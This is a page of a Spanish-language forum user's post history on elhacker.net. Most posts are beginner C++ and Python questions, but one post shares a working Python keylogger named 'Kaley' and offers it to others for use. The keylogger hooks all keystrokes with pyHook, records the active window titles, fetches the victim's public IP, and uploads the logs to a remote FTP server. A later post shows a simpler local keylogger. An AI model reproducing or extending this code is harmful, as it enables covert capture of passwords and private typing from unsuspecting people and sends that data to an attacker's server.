elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 [2] 3 4
11  Programación / Programación C/C++ / Re: Nuevo en C++ en: 20 Julio 2012, 00:06 am
En C no hay objetos ni clases?
12  Programación / Programación C/C++ / Re: Nuevo en C++ en: 19 Julio 2012, 23:56 pm
Muchas gracias! Pinta bastante bien el manual, este sí que me ha gustado. Una pena que sea de C,  ya que parece haber algunas diferencias importantes con respecto a C++. Será esto un problema?
13  Programación / Programación C/C++ / Re: Nuevo en C++ en: 19 Julio 2012, 23:17 pm
Muchas gracias por tu ayuda, pero la verdad es que ya había visto esas páginas y no me han gustado mucho por como estan redactadas. Busco algo lo más ameno posible de leer. Alguna sugerencia?
14  Programación / Programación C/C++ / Nuevo en C++ en: 18 Julio 2012, 01:20 am
Saludos, después de estar aprendiendo un poco de Python por mi cuenta (gracias al magnífico manual de mundogeek) me he decidido a empezar con C++.

Sin embargo, no encuentro realmente ningún libro/tutorial que me guste demasiado para aprender. Busco algo como el de python de mundogeek, que te explique lo básico, sin enrollarse demasiado, y que esté bastante claro. Esto último lo digo porque ya me he encontrado con el tema del cout y el printf, y supongo que también cambiarán otras muchás cosas conforme vaya avanzando.

En definitiva lo que busco es algún libro o pdf que te explique lo básico de C++, para poder ir haciendo mis cosillas. Un saludo.
15  Programación / Scripting / Re: [Python] N00b. en: 27 Octubre 2011, 23:07 pm
Es con el que yo empecé a programar. Aún no soy un experto, pero gracias a él me defiendo bien en el lenguaje. Mucha suerte, y sobre todo ganas de programar :P
16  Programación / Scripting / Re: PYTHON en: 27 Octubre 2011, 23:05 pm
Creo que en Python no se ponen paréntesis en los condicionales, aquí te dejo el código arreglado y con una línea menos, ya que a raw_input se le puede añadir un texto a imprimir:

Código
  1. num = int(raw_input('Ingrese un numero: '))
  2.  
  3. if num % 2 == 0:
  4.    print 'El numero', num,' es par '
  5. else:
  6.    print 'El numero ',num,' es impar'

Como guía para iniciarte, te recomiendo esta. Mucha suerte y sobre todo no desesperes.
17  Programación / Scripting / Re: [Python] N00b. en: 22 Octubre 2011, 18:03 pm
Mirate esta guia, con eso y un poco de paciencia te puedes iniciar bastante bien en Python: http://mundogeek.net/tutorial-python/
18  Programación / Scripting / Como seguir en Python en: 25 Septiembre 2011, 23:19 pm
Saludos, llevo ya algún tiempo programando en Python (cosa de un mes o así) y ya estoy acabando la guía de Raúl González Duque, muy buena por cierto. Mi pregunta es la siguiente: ¿cómo puedo seguir aprendiendo ahora? Es el primer lenguaje de programación que aprendo, y la verdad no sé que hacer ahora. ¿debería comprarme un libro? ¿alguno en especial? No me importa mucho el idioma, aunque si es en español, mejor que mejor. Gracias de antemano.

Fyrox
19  Programación / Scripting / [Python] Kaley, Keylogger simple en Python en: 21 Septiembre 2011, 23:24 pm
Saludos, después de un tiempecillo programando en Python, al fin me he decidido a crear un Keylogger. Como no llevo mucho tiempo programando, lo subo aquí para que aportéis ideas/mejores formas de codear determinadas cosas en Python, además de para que lo uséis si queréis.
Código
  1. # coding= utf-8
  2. import pythoncom, pyHook, ftplib, urllib, datetime, time, thread, os
  3.  
  4. class Kaley:
  5.    def __init__(self):
  6.        self.current_window = None
  7.        self.namefile = str(self.getIP()) + " - " + str(self.getDate()) + ".txt"
  8.        self.f = ftplib.FTP("server")
  9.        self.f.login("user", "pass")
  10.        self.f.cwd("/html/kaley")
  11.        self.run = False
  12.  
  13.    def getIP(self):
  14.        url = urllib.URLopener()
  15.        resp = url.open("http://automation.whatismyip.com/n09230945.asp")
  16.        html = resp.read(114)
  17.        return html
  18.  
  19.    def getDate(self):
  20.        now = datetime.datetime.now()
  21.        return now.strftime("%Y-%m-%d")
  22.  
  23.    def write(self, text):
  24.        file = open(self.namefile, "a")
  25.        file.write(text)
  26.        file.close()
  27.        if self.run == False:
  28.            thread.start_new_thread(self.upload, ())
  29.  
  30.    def upload(self):
  31.        self.run = True
  32.        time.sleep(5)
  33.        self.f.storbinary("STOR " + self.namefile, open(self.namefile, "rb"))
  34.        self.run = False
  35.  
  36.    def stroke(self, event):
  37.        if event.WindowName != self.current_window:
  38.            self.write("\n" + event.WindowName + "\n")
  39.            self.current_window = event.WindowName
  40.        if event.Ascii == 32 or event.Ascii == 9:
  41.             self.write(" ")
  42.        elif event.Ascii == 241 or event.Ascii == 209:
  43.            self.write("Ñ")
  44.        elif event.Ascii == 13:
  45.            self.write("\n")
  46.        else:
  47.            self.write(event.Key)
  48.  
  49. log = Kaley()
  50. ph = pyHook.HookManager()
  51. ph.KeyDown = log.stroke
  52. ph.HookKeyboard()
  53. pythoncom.PumpMessages()

Como podéis ver, os hacen falta las librerias pyHook para ejecutarlos.

Fyrox
20  Programación / Scripting / [Python] print solo si cambia la variable en: 18 Septiembre 2011, 01:12 am
Buenas de nuevo, esta vez mas que un error traigo una duda sobre un programilla que estoy intentando hacer. Veréis. me he lanzado a hacer un pequeño keylogger local muy muy básico (de momento, ya lo ampliare) con el modulo pyHook. Aquí esta:

Código
  1. import pythoncom, pyHook
  2.  
  3. def strokes(event):
  4.    print event.WindowName
  5.    print event.Key
  6.  
  7. hm = pyHook.HookManager()
  8. hm.KeyDown = strokes
  9. hm.HookKeyboard()
  10. pythoncom.PumpMessages()
  11.  

Bien, este pequeño keylogger hace que cada vez que se pulse una tecla imprima en el programa el nombre de la ventana y la tecla. Esto queda bastante mal a la hora de leer lo que se ha escrito, ya que se escribiria el nombre de la ventana por cada tecla que se pulsase. Para solucionarlo, lo que quiero hacer es que imprima el nombre de la ventana, la tecla pulsada, y luego solamente imprima de nuevo el nombre de la ventana si esta cambia, no se si me explico.

Por ejemplo: escribes "facebook" en google, por lo que el nombre de la ventana seria "Google". A partir de ahi, quiero que solamente vuelva a escribir el nombre de la ventana si deja de ser "Google" para ser "Facebook" por ejemplo. Gracias de antemano.
Páginas: 1 [2] 3 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines